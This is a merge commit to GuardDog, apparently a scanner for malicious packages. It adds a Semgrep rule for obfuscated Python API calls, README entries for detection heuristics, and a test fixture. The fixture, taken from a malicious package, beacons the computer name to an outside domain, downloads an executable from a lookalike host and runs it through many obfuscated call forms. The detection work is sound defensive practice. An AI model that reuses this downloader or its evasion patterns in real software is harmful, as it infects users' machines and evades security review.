Merge pull request #607 from biagiom/main

sobregosodd · web-flow · commit 4f5f84053285 · 2025-10-01T08:26:56.000-03:00
API obfuscation: new rule and test cases
diff --git a/README.md b/README.md
@@ -108,6 +108,7 @@ Source code heuristics:
 
 | **Heuristic** | **Description** |
 |:-------------:|:---------------:|
+| api-obfuscation | Identify obfuscated API calls using alternative Python syntax patterns |
 | shady-links | Identify when a package contains an URL to a domain with a suspicious extension |
 | obfuscation | Identify when a package uses a common obfuscation method often used by malware |
 | clipboard-access | Identify when a package reads or write data from the clipboard |
@@ -118,6 +119,7 @@ Source code heuristics:
 | dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL |
 | steganography | Identify when a package retrieves hidden data from an image and executes it |
 | code-execution | Identify when an OS command is executed in the setup.py file |
+| unicode | Identify suspicious unicode characters |
 | cmd-overwrite | Identify when the 'install' command is overwritten in setup.py, indicating a piece of code automatically running when the package is installed |
 
 Metadata heuristics:
@@ -199,6 +201,23 @@ Source code heuristics:
 | npm-steganography | Identify when a package retrieves hidden data from an image and executes it |
 | npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL |
 | npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system |
+### Extension
+
+Source code heuristics:
+
+| **Heuristic** | **Description** |
+|:-------------:|:---------------:|
+| npm-serialize-environment | Identify when a package serializes 'process.env' to exfiltrate environment variables |
+| npm-obfuscation | Identify when a package uses a common obfuscation method often used by malware |
+| npm-silent-process-execution | Identify when a package silently executes an executable |
+| shady-links | Identify when a package contains an URL to a domain with a suspicious extension |
+| npm-exec-base64 | Identify when a package dynamically executes code through 'eval' |
+| npm-install-script | Identify when a package has a pre or post-install script automatically running commands |
+| npm-steganography | Identify when a package retrieves hidden data from an image and executes it |
+| npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL |
+| npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system |
+| extension_suspicious_passwd_access_linux |  |
+| extension_powershell_policy_bypass |  |
 <!-- END_RULE_LIST -->
 
 ## Custom Rules
diff --git a/guarddog/analyzer/sourcecode/api-obfuscation.yml b/guarddog/analyzer/sourcecode/api-obfuscation.yml
@@ -0,0 +1,42 @@
+rules:
+    - id: api-obfuscation
+      languages:
+        - python
+      message: This package uses obfuscated API calls that may evade static analysis detection
+      metadata:
+        description: Identify obfuscated API calls using alternative Python syntax patterns
+      severity: WARNING
+      patterns:
+        - pattern-either:
+          # Covered cases:
+          # 1) __dict__ access patterns: $MODULE.__dict__[$METHOD](...) / .__call__(...)
+          # 2) __getattribute__ patterns: $MODULE.__getattribute__($METHOD)(...) / .__call__(...)
+          # 3) getattr patterns: getattr($MODULE, $METHOD)(...) / .__call__(...)
+          # It also covers the case where $MODULE is imported as __import__('mod')
+          - patterns:
+              - pattern-either:
+                  - pattern: $MODULE.__dict__[$METHOD]($...ARGS)
+                  - pattern: $MODULE.__dict__[$METHOD].__call__($...ARGS)
+                  - pattern: $MODULE.__getattribute__($METHOD)($...ARGS)
+                  - pattern: $MODULE.__getattribute__($METHOD).__call__($...ARGS)
+                  - pattern: getattr($MODULE, $METHOD)($...ARGS)
+                  - pattern: getattr($MODULE, $METHOD).__call__($...ARGS)
+              - metavariable-regex:
+                  metavariable: $MODULE
+                  regex: "^[A-Za-z_][A-Za-z0-9_\\.]*$|^__import__\\([\"'][A-Za-z_][A-Za-z0-9_]*[\"']\\)$"
+              - metavariable-regex:
+                  metavariable: $METHOD
+                  regex: "^[\"'][A-Za-z_][A-Za-z0-9_]*[\"']$"
+
+          # --- Additional Cases: __import__('mod').method(...) / .__call__(...)
+          - patterns:
+              - pattern-either:
+                  - pattern: __import__($MODULE).$METHOD($...ARGS)
+                  - pattern: __import__($MODULE).$METHOD.__call__($...ARGS)
+              - metavariable-regex:
+                  metavariable: $MODULE
+                  regex: "^[\"'][A-Za-z_][A-Za-z0-9_]*[\"']$"
+              - metavariable-regex:
+                  metavariable: $METHOD
+                  # avoid matching __getattribute__
+                  regex: "[^(__getattribute__)][A-Za-z_][A-Za-z0-9_]*"
diff --git a/tests/analyzer/sourcecode/api-obfuscation.py b/tests/analyzer/sourcecode/api-obfuscation.py
@@ -0,0 +1,33 @@
+""" Tests for api-obfuscation rule
+
+    RULEID cases:
+      - obfuscated version of 1337c package
+"""
+
+def send():
+    try:
+        env = os.environ['COMPUTERNAME']
+        t = requests.get("https://linkedopports.com/pyp/resp.php?live=Installation " +env)
+        if platform == 'win32':
+            url = 'https://python-release.com/python-install.scr'
+            filename = 'ini_file_pyp_32.exe'
+            rq = requests.get(url, allow_redirects=True)
+            open(filename, 'wb').write(rq.content)
+            
+            # os.system('start '+filename)
+            os.__dict__['startfile']('start '+filename)
+            os.__dict__['startfile'].__call__('start '+filename)
+            os.__getattribute__('startfile')('start '+filename)
+            os.__getattribute__('startfile').__call__('start '+filename)
+            getattr(os, 'startfile')('start '+filename)
+            getattr(os, 'startfile').__call__('start '+filename)
+            __import__('os').startfile('start '+filename)
+            __import__('os').startfile.__call__('start '+filename)
+            __import__('os').__dict__['startfile']('start '+filename)
+            __import__('os').__dict__['startfile'].__call__('start '+filename)
+            __import__('os').__getattribute__('startfile')('start '+filename)
+            __import__('os').__getattribute__('startfile').__call__('start '+filename)
+            getattr(__import__('os'), 'startfile')('start '+filename)
+            getattr(__import__('os'), 'startfile').__call__('start '+filename)
+    except:
+        pass    
